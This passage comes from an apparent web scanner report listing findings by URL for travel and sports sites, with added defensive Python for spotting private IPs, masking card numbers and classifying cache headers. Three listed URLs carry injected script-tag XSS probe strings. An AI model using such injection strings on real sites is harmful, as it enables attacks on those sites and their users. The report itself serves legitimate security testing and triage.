22.2. http://ads2.adbrite.com/v0/ad

22.3. http://ak-static.travel-ticker.com/static/images/1x1.jpg

22.4. http://aon.com/js/s_code.js

22.5. http://httpd.apache.org/

22.6. http://httpd.apache.org/download.cgi

22.7. http://i.travelpn.com.edgesuite.net/jquery/plug-ins/jquery.cookie.js

22.8. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/news/article-merged.js

22.9. http://i1.goal.com/web/goal/2011092112-rev15541/js/default/section/team-merged.js

22.10. http://media.away.com/trip/tripjs/s_code.js

22.11. https://secure.mlb.com/shared/scripts/bam/bam.session.js

22.12. http://sorry.manutd.com/errorRedirector.html

22.13. http://static.guim.co.uk/static/32b9600ebe43926107624a816c7870f8566f154f/common/external-scripts/jquery-libraries/jquery.cookie.js

22.14. http://travela.priceline.com/zp/zpcal/src/calendar-core.js

22.15. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/sy/0025-en_us/display.pkg.js

22.16. http://w.sharethis.com/button/buttons.js

22.17. http://www.aon.com/js/s_code.js

22.18. http://www.barclayswealth.com/Scripts/swfobject_modified.js

22.19. http://www.barclayswealth.com/important-information.htm

22.20. http://www.expedia.com/static/default/default/scripts/formController.js

22.21. http://www.google.com/search

22.22. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

22.23. http://www.hotels.com/hotel/details.html

22.24. http://www.hotels.com/search.do

22.25. http://www.hotels.com/search/search.html

22.26. http://www.manutd.com/styles/js/jquery.jqplugin.1.0.2.min.js

22.27. http://www.nike.com/nikeos/global/js/NIKEOS.global.js

22.28. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js

22.29. http://www.orbitz.com/shared/js/exitApp.js

22.30. http://www.sabreairlinesolutions.com/home/

22.31. http://www.sabreairlinesolutions.com/js/jquery.colorbox-min.js

22.32. http://www.sabreairlinesolutions.com/js/jquery.cookie.js

22.33. http://www.sabreairlinesolutions.com/js/jquery.equalHeights.js

22.34. http://www.sabrehospitality.com/js/modal.js

22.35. http://www.sabrehospitality.com/js/roundies.js

22.36. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

22.37. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

22.38. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

22.39. http://www.sabretravelnetwork.com/images/home-text.png

22.40. http://www.sabretravelnetwork.com/js/colorbox/jquery.colorbox-min.js

22.41. http://www.sabretravelnetwork.com/js/jquery.equalHeights.js

22.42. http://www.travelocity.com/

22.43. http://www.travelocity.com/472a

22.44. http://www.turkishairlines.com/static/js/plugin/datepicker/date_en.js

22.45. http://www.turkishairlines.com/static/js/plugin/jquery-fieldselection.pack.js

22.46. http://www.turkishairlines.com/static/js/plugin/jquery.combo/jquery.combo.min.js

22.47. http://www.turkishairlines.com/static/js/plugin/jquery.cookie.js

23. Private IP addresses disclosed

23.1. http://api.connect.facebook.com/crossdomain.xml

23.2. http://api.connect.facebook.com/restserver.php

23.3. http://api.facebook.com/method/fql.query

23.4. http://api.facebook.com/restserver.php

23.5. http://connect.facebook.net/en_US/all.js

23.6. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

23.7. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results

23.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

23.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

23.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

23.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

23.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results

23.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

23.14. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

23.15. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

23.16. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.17. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

23.18. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

23.19. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=342x296&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.20. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=300x250&random=634531891718497471

23.21. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=1&random=634531891718497471

23.22. http://dm.travelocity.com/js.ng/site=igougo&area=other&tile=824288629634531891718497471&adsize=728x90&pagepos=2&random=634531891718497471

23.23. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1295234161634531840155155327&adsize=728x90&pagepos=1&random=634531840155155327

23.24. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=1967228532634531863146718750&adsize=728x90&pagepos=1&random=634531863146718750

23.25. http://dm.travelocity.com/js.ng/site=igougo&area=ratefinderhotel&tile=334526774634531842119167547&adsize=728x90&pagepos=1&random=634531842119167547

23.26. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

23.27. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

23.28. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=370629

23.29. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&area=hotel&dest=BOS&adsize=sponlinks&pagepos=1&random=854351

23.30. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.31. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.32. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.33. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.34. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.35. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.36. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

23.37. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.38. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.39. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.40. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.41. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.42. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

23.43. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.44. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.45. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.46. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/drf

23.47. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

23.48. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/drflib.js

23.49. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/i18n/en.js

23.50. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

23.51. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.css

23.52. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

23.53. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/v1.0/imgs/advertisers_US.png

23.54. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

23.55. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/images/button.gif

23.56. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

23.57. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/scripts/script.js

23.58. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

23.59. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/H_PopUnder/v0.1/styles/style.css

23.60. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

23.61. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/widgets/ht/common/js/tvly/hotels.js

23.62. http://media.expedia.com/ads/travelhook/travelhook.js

23.63. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.64. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.65. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

23.66. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

23.67. http://static.ak.connect.facebook.com/connect.php/en_US

23.68. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

23.69. http://static.ak.connect.facebook.com/images/connect_sprite.png

23.70. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

23.71. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.72. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

23.73. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

23.74. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.75. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.76. http://travelocity.tt.omtrdc.net/m2/travelocity/mbox/standard

23.77. http://www.facebook.com/dialog/oauth

23.78. http://www.facebook.com/extern/login_status.php

23.79. http://www.facebook.com/extern/login_status.php

23.80. http://www.facebook.com/extern/login_status.php

23.81. http://www.facebook.com/extern/login_status.php

23.82. http://www.facebook.com/extern/login_status.php

23.83. http://www.facebook.com/extern/login_status.php

23.84. http://www.facebook.com/extern/login_status.php

23.85. http://www.facebook.com/plugins/like.php

23.86. http://www.facebook.com/plugins/like.php

23.87. http://www.facebook.com/plugins/like.php

23.88. http://www.facebook.com/plugins/like.php

23.89. http://www.facebook.com/plugins/like.php

23.90. http://www.facebook.com/plugins/like.php

23.91. http://www.facebook.com/plugins/like.php

23.92. http://www.facebook.com/plugins/like.php

23.93. http://www.facebook.com/plugins/like.php

23.94. http://www.facebook.com/plugins/like.php

23.95. http://www.facebook.com/plugins/like.php

23.96. http://www.facebook.com/plugins/like.php

23.97. http://www.facebook.com/plugins/like.php

23.98. http://www.facebook.com/plugins/like.php

23.99. http://www.facebook.com/plugins/like.php

23.100. http://www.facebook.com/plugins/like.php

23.101. http://www.facebook.com/plugins/like.php

23.102. http://www.facebook.com/plugins/like.php

23.103. http://www.facebook.com/plugins/like.php

23.104. http://www.facebook.com/plugins/like.php

23.105. http://www.facebook.com/plugins/like.php

23.106. http://www.facebook.com/plugins/like.php

23.107. http://www.facebook.com/plugins/like.php

23.108. http://www.facebook.com/plugins/like.php

23.109. http://www.facebook.com/plugins/like.php

23.110. http://www.facebook.com/plugins/like.php

23.111. http://www.facebook.com/plugins/like.php

23.112. http://www.facebook.com/plugins/like.php

23.113. http://www.facebook.com/plugins/like.php

23.114. http://www.facebook.com/plugins/like.php

23.115. http://www.facebook.com/plugins/like.php

23.116. http://www.facebook.com/plugins/like.php

23.117. http://www.facebook.com/plugins/like.php

23.118. http://www.facebook.com/plugins/like.php

23.119. http://www.facebook.com/plugins/like.php

23.120. http://www.facebook.com/plugins/like.php

23.121. http://www.facebook.com/plugins/like.php

23.122. http://www.facebook.com/plugins/like.php

23.123. http://www.facebook.com/plugins/likebox.php

23.124. http://www.facebook.com/plugins/likebox.php

23.125. http://www.facebook.com/plugins/likebox.php

23.126. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.127. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.128. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.129. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

23.130. http://xml.premierleague.com/crossDomain.html
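
RFC 1918 addresses in a response body (a comment naming the back-end node, a debug value in script, a hard-coded beacon URL) tell an attacker how the internal network is laid out. That is not exploitable by itself, but it hands over target addresses for SSRF and for pivoting after a foothold, and because the check is a pattern match on dotted quads it also fires on version strings and on third-party script that happens to mention such an address. The example below is added to this page (it is not the scanner's own logic) and reproduces the check with the two filters that keep triage honest: a parse that rejects non-addresses and an explicit RFC 1918 test instead of any broader notion of "private". The response body is constructed.

```python
import ipaddress
import re
from typing import List

# RFC 1918 ranges, which is what a "private IP address disclosed" check means.
RFC1918 = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]

# A dotted quad not embedded in a longer dotted-digit run, so "1.2.3.4.5" is skipped.
_QUAD = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def private_ips(text: str) -> List[str]:
    """Return RFC 1918 addresses found in text, deduplicated, in order of first appearance."""
    seen: List[str] = []
    for match in _QUAD.finditer(text):
        try:
            addr = ipaddress.IPv4Address(match.group(1))
        except ipaddress.AddressValueError:
            continue  # octet over 255, e.g. 10.0.0.999: not an address at all
        if any(addr in net for net in RFC1918) and str(addr) not in seen:
            seen.append(str(addr))
    return seen


def private_ip_report(text: str) -> List[str]:
    """Each hit tagged with the range it falls in, the form a triage note wants."""
    out = []
    for ip in private_ips(text):
        addr = ipaddress.IPv4Address(ip)
        net = next(n for n in RFC1918 if addr in n)
        out.append(f"{ip} ({net})")
    return out


# Constructed response body, not captured from any host listed above.
SAMPLE_BODY = """
<!-- served-by app-03 192.168.12.7 -->
<script>
  var beacon = "http://10.20.30.40/pixel.gif";
  var dns = "8.8.8.8";            // public, not reported
  var edge = "172.32.0.1";        // outside 172.16/12, not reported
  var build = "10.0.0.999";       // not a valid address
  var again = "192.168.12.7";     // duplicate, reported once
</script>
"""

if __name__ == "__main__":
    for line in private_ip_report(SAMPLE_BODY):
        print(line)
```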

24. Credit card numbers disclosed

24.1. http://www.cheaptickets.com/shop/hotelsearch

24.2. http://www.expedia.com/Hotel-Search

24.3. http://www.orbitz.com/shop/hotelsearch
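
This check matches runs of 13 to 19 digits that pass the Luhn mod-10 test, so it fires on any numeric identifier that happens to satisfy mod-10 as readily as on a real primary account number. Each hit therefore needs a look at the response to see what the number actually is, and whatever is written down during that triage must not contain the full digit string. The example below is added to this page, not taken from the scanner: it reproduces the heuristic, adds an issuer-prefix filter that removes most Luhn-valid IDs, and masks every candidate to the first six and last four digits. The page fragment it runs over is constructed.

```python
import re
from typing import Dict, List, Optional

# 13 to 19 digits, each pair optionally split by one space or hyphen,
# not glued to a longer digit run on either side.
_CANDIDATE = re.compile(r"(?<!\d)(\d(?:[ -]?\d){12,18})(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check: from the right, double every second digit."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def issuer(digits: str) -> Optional[str]:
    """Coarse issuer guess from leading digits and length; None when no known scheme fits."""
    n = len(digits)
    if digits[0] == "4" and n in (13, 16, 19):
        return "visa"
    if digits[:2] in ("34", "37") and n == 15:
        return "amex"
    if "51" <= digits[:2] <= "55" and n == 16:
        return "mastercard"
    if (digits.startswith("6011") or digits.startswith("65")) and n == 16:
        return "discover"
    return None


def mask(digits: str) -> str:
    """First six and last four only, the most a triage note should ever contain."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def card_candidates(text: str) -> List[Dict[str, object]]:
    out: List[Dict[str, object]] = []
    for m in _CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(1))
        luhn = luhn_ok(digits)
        scheme = issuer(digits)
        out.append({
            "masked": mask(digits),
            "luhn": luhn,
            "issuer": scheme,
            # A PAN only when both checks agree; otherwise an ID, a reference number or a typo.
            "likely_pan": luhn and scheme is not None,
        })
    return out


# Constructed page fragment, not captured from any site in this report.
# 4111... and 3782... are the usual Visa and Amex test numbers.
SAMPLE = """
Card on file: 4111 1111 1111 1111 (exp 12/14)
Corporate card: 378282246310005
Confirmation: 1234567812345670
Mistyped: 4111111111111112
Booked: 2011-10-02
"""

if __name__ == "__main__":
    for row in card_candidates(SAMPLE):
        print(row)
```

The third sample line is the case that makes the prefix filter worth having: 1234567812345670 passes Luhn but matches no issuer, which is exactly how a confirmation number ends up in a "credit card numbers disclosed" list.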

25. Robots.txt file

25.1. http://a.analytics.yahoo.com/fpc.pl

25.2. http://ad-dc2.adtech.de/adperf%7C2.0%7C327%7C2812329%7C0%7C170%7CAdId=6453063

25.3. http://ad.doubleclick.net/adj/cm.guardian/

25.4. http://ad.technoratimedia.com/st

25.5. http://ad.turn.com/server/ads.js

25.6. http://ad.yieldmanager.com/st

25.7. http://ad4.liverail.com/crossdomain.xml

25.8. http://ads.pointroll.com/PortalServe/

25.9. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

25.10. http://b.scorecardresearch.com/b

25.11. http://bcp.crwdcntrl.net/4/c=412%7Crand=756616954%7Cpv=y%7Crt=ifr

25.12. http://beacon.securestudies.com/scripts/beacon.dll

25.13. http://c.betrad.com/a/n/44/546.js

25.14. http://cas.criteo.com/delivery/ajs.php

25.15. http://cdn.flashtalking.com/xre/18/183799/231524/swf/Barclays_wealth_dynamic_300x250.swf

25.16. http://cdn.turn.com/server/ddc.htm

25.17. http://d.tradex.openx.com/afr.php

25.18. http://ehg-twi.hitbox.com/HG

25.19. http://googleads.g.doubleclick.net/pagead/ads

25.20. http://hits.guardian.co.uk/b/ss/guardiangu-football,guardiangu-network/1/H.22.1/s95621589564252

25.21. http://idpix.media6degrees.com/orbserv/hbpix

25.22. http://kantarmedia.guardian.co.uk/RealMedia/ads/adstream.cap

25.23. http://m.xp1.ru4.com/activity

25.24. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/football/manchester-united/oas.html/1603912970@Top,Right1,x31,Position4

25.25. http://openx.px.invitemedia.com/openx_sync

25.26. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

25.27. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

25.28. http://premiumtv.122.2o7.net/b/ss/premiumtvpremierleague/1/H.2-pdv-2/s98395569906570

25.29. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

25.30. http://resource.guim.co.uk/books/gubookshop/thumbnail/images.bertrams.com/ProductImages/services/GetImage

25.31. http://s0.2mdn.net/2502400/LloydsTSB_PIA_Direct_728x90.swf

25.32. http://safebrowsing.clients.google.com/safebrowsing/gethash

25.33. https://secure.mlb.com/resetPassword.do

25.34. http://servedby.flashtalking.com/imp/1/16628

25.35. http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf

25.36. http://sync.mathtag.com/sync/img

25.37. http://tag.admeld.com/id

25.38. http://www.goal.com/en/teams/england/97/man-utd-news

25.39. http://www.google-analytics.com/__utm.gif

25.40. http://www.guardian.co.uk/football/manchester-united

25.41. http://www.luminate.com/widget/v3/53d1ac1014/config/

25.42. http://www.manutd.com/

25.43. http://www.premierleague.com/page/Home/0,,12306,00.html

26. Cacheable HTTPS response

26.1. https://axptravel.americanexpress.com/consumertravel/customlogin.do

26.2. https://go.americanexpress-travel.com/hotel/HotelCobrand.do

26.3. https://secure.mlb.com/resetPassword.do

26.4. https://www.expedia.com/static/default/default/stubs/adserver.json

26.5. https://www.hotelplanner.com/

26.6. https://www.hotelplanner.com/Accept/Reserve.cfm

26.7. https://www.hotelplanner.com/LastActive.cfm

26.8. https://www.hotelplanner.com/TT.cfm
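
The finding means the response carried nothing that stops a cache from writing it to disk. Whether that matters depends on the content: for a static asset caching is usually intended, while a login page or a reservation step (the customlogin.do, Reserve.cfm and resetPassword.do entries above are of that kind) can leave personalised content in the browser cache or in an intermediary after the session ends. Only Cache-Control: no-store stops every cache from storing the body; private only excludes shared caches, and no-cache, max-age=0, Pragma and an expired Expires merely force revalidation of a copy that has still been written. The example below is added to this page (not tooling from the report) and classifies a header set by those rules, with the header set to send on a sensitive HTTPS page. The header samples are constructed.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, Optional


def parse_cache_control(value: str) -> Dict[str, str]:
    """Split "private, max-age=600" into {"private": "", "max-age": "600"}."""
    directives: Dict[str, str] = {}
    for part in value.split(","):
        part = part.strip()
        if part:
            name, _, arg = part.partition("=")
            directives[name.strip().lower()] = arg.strip().strip('"')
    return directives


def cacheability(headers: Dict[str, str], now: Optional[datetime] = None) -> str:
    """Classify a response as 'no-store', 'private', 'revalidate' or 'cacheable'.

    Anything that lands in the last bucket is what the scanner reports as a
    cacheable HTTPS response.
    """
    now = now or datetime.now(timezone.utc)
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control", ""))
    if "no-store" in cc:
        return "no-store"
    if "private" in cc:
        return "private"
    if "no-cache" in cc or cc.get("max-age") == "0" or h.get("pragma", "").lower() == "no-cache":
        return "revalidate"
    if "expires" in h:
        try:
            exp = parsedate_to_datetime(h["expires"])
        except (TypeError, ValueError):
            return "revalidate"  # RFC 7234: an invalid Expires such as "0" means already expired
        if exp.tzinfo is None:
            exp = exp.replace(tzinfo=timezone.utc)
        if exp <= now:
            return "revalidate"
    return "cacheable"


def hardened_headers() -> Dict[str, str]:
    """Header set for an HTTPS page that carries per-user data (login, reservation, account)."""
    return {
        "Cache-Control": "no-store, no-cache, must-revalidate",
        "Pragma": "no-cache",   # for HTTP/1.0 intermediaries that ignore Cache-Control
        "Expires": "0",
    }


# Constructed header sets, not captured from any host listed above.
WEAK = {"Content-Type": "text/html; charset=utf-8", "Date": "Sun, 02 Oct 2011 21:15:06 GMT"}
STATIC_OK = {"Content-Type": "application/json", "Cache-Control": "public, max-age=3600"}

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK), ("static", STATIC_OK), ("hardened", hardened_headers())):
        print(label, cacheability(hdrs))
```

Both WEAK and STATIC_OK classify as cacheable; the difference between a finding and a non-issue is what the body contains, not the headers alone.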

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

27.2. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

27.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

27.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

27.5. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

27.6. http://ad.doubleclick.net/adi/gna.en/level2

27.7. http://ad.yieldmanager.com/iframe3

27.8. http://ads.pointroll.com/PortalServe/

27.9. http://amch.questionmarket.com/adscgen/st.php

27.10. http://aud.pubmatic.com/AdServer/Artemis

27.11. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

27.12. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

27.13. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

27.14. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

27.15. http://content1.admonkey.dapper.net/clients/expedia/SearchResults_US.html

27.16. http://d.xp1.ru4.com/meta

27.17. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

27.18. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

27.19. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

27.20. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

27.21. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

27.22. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

27.23. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

27.24. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

